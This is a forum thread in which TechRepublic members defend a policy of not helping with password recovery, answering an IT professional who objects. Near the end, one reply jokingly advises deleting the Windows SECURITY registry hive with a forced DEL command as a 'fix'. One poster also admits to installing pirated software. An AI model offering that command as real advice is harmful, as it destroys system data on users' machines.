TR members do not assist in password recovery or removal.

We, the members of TechRepublic – A Resource for IT Professionals, will not assist anyone in the recovery/removal of lost passwords. You may have a legitimate reason to recover/remove a password. However, we cannot verify your motives and will therefore not assist anyone in what may be an attempt at gaining unauthorized access to a computer system. Due to the open nature of this forum, any assistance given to help circumvent security measures, even for legitimate purposes, would be available for unscrupulous individuals to use for illegitimate purposes. This is a risk that we, the members of TechRepublic, will not take. Please do not ask questions of this nature on TechRepublic.

If you have a legitimate need to circumvent a password scheme, please contact the vendor for the software / hardware and request their assistance. E.g. Windows XP password recovery/removal issues should be taken up with Microsoft’s technical support, Phoenix BIOS password recovery/removal issues should be taken up with Phoenix Technologies, hard drive password recovery/removal should be taken up with the manufacturer of the hard drive, etc…

To those viewing this post: Please DO NOT respond any further to this thread.

Passwords: Is this serious?

by derek ·

In reply to TR members do not assist in password recovery or removal.

Ok I just needed to clarify the post about “not circumventing” passwords. Where did this come from?

“We, the members of TechRepublic – A Resource for IT Professionals, will not assist anyone in the recovery/removal of lost passwords. You may have a legitimate reason to recover/remove a password.”

Is this in the terms of service of the website or something? Am I going to get kicked for responding? As an IT pro we have legitimate cause to circumvent passwords all the time. Several time a week usually and that doesn’t count when we are doing forenic investigations.

My concern is the tone of the admonishment. I am hoping it is a joke that I don’t get.

I am a 15+ year experience IT Pro and Expert Witness. I Crack Passwords. ALOT. Almost every day. I have been known to install pirated software too. There are MANY MANY legitmate reasons to that as well.

What I will not do, what I ABSOLUTELY refuse to do, is to let someone on a tech board get high and self righteous as if educating people is somehow a crime. As if we are bringing fire down from Olympus or something.

We all know XP & Vista password protection is crap. It isn’t like we are talking about National Security secrets. Who hasn’t gotten a laptop back from a remote employee that was terminated only to find the passwords changed. DUDE Every week! Who hasn’t had people change their password and forget. (Does logging in as an admin to change a users password count as circumventing as well?)

Finally, who calls microsoft to reset a password?

I understand that this isn’t a board for crackers, but it isn’t a CABAL of KNIGHTS OF THE DARK SECRETS either.

Sigh.

No not at all but Gino and Luigi will pay you a visit and after they leave you’ll be hoping to get locked away for your own protection to stop any others getting at you. 😀

The above was put together after a discussion between the various TR Peers because we are IT professionals who administer systems, Try to secure systems or generally protect Data in General we are offended by the numerous Password Cracks being asked for. This was done in an attempt not to cause offense but there are some weirdos who take offense at the air that they breath so there is no way to prevent that from occurring. I do however suggest that you look here and if you are so offended contribute your ideas. :p

http://techrepublic.com.com/5208-6230-0.html?forumID=102&threadID=248696&messageID=2389796

There is of course nothing preventing any one visiting a Crackers Site to gain this information but they want IT professionals to give it to them because they believe that it’s better and safer because they don’t want to get infected with one of the numerous Crackers play toys. When you see 25 of these in a day being asked here it does get somewhat tiresome.

You also have to admit that it is much better than something like RTFM you silly git.

But if this helps I personally like the RTFM you silly git much more than being nice. 😉

“Where did this come from? ”
We, the peers of TR have gone n circles over this and decided it was best, as we do not know the intentions of the OP or anyone else digging up the thread

“As an IT pro we have legitimate cause to circumvent passwords all the time.”
Yes, and we know how to do it. Often, with paid for utilities from MS, however, not always. Many people post here, not just IT Pros.

“I have been known to install pirated software too. ”
You really shouldnt admit to that. I know I DO NOT install pirated SW, however, I work at a place which has volume licenses for everything, and I have an MSDN downloads account.

“What I will not do, what I ABSOLUTELY refuse to do, is to let someone on a tech board get high and self righteous as if educating people is somehow a crime.”

FU — it is not educating people, it would be giving away the answers to them and anyone else that decided to drop by. This would include thieves and other bad types. since we cannot verify anything online, it is best not to be an accessory to a crime.

“We all know XP & Vista password protection is crap. It isn’t like we are talking about National Security secrets. ”

And how about confidential information, peoples personal information, etc.. There are plenty of places to get the info, from a simple Google search. They do not need to come here to ask. If you cant handle it — see ya! Go elsewhere! There are other forums which will answer these — go there instead.

“I understand that this isn’t a board for crackers, but it isn’t a CABAL of KNIGHTS OF THE DARK SECRETS either.”
Isnt it??? Oh, you are right. Instead we are just professional scumbags 😀

To turn the question back to you

by nicknielsen ·

In reply to Passwords: Is this serious?

You’ve been around TR long enough to “understand that this isn’t a board for crackers”, yet you question the response here? How ’bout some scenarios.

Scenario 1: A regular customer calls you and says “Hey, I just changed my password, took your advice about strong passwords, didn’t write it down and now I’m locked out. Can you fix it for me?” What do you say?

Scenario 2: An individual you’ve never seen before brings in a PC and and says “Hey, I can’t remember my password. Will you fix it for me?” Examining the PC, you notice there is still a connector in the keyboard port, but the cable has been cut. What do you say?

Here at TR, we have no way to determine which scenario is the case. To avoid potential legal issues, TR peers have chosen to not answer the question at all. It has to do with professional ethics.

He doesn’t just want to break the password, he also wants to break the software!

This is easily done. Click on the Start button, then click on Run. In the Run window type “DEL C:\WINDOWS\SYSTEM32\CONFIG\SECURITY /F” and press Enter.

Poof! Both your password and software problems are solved.
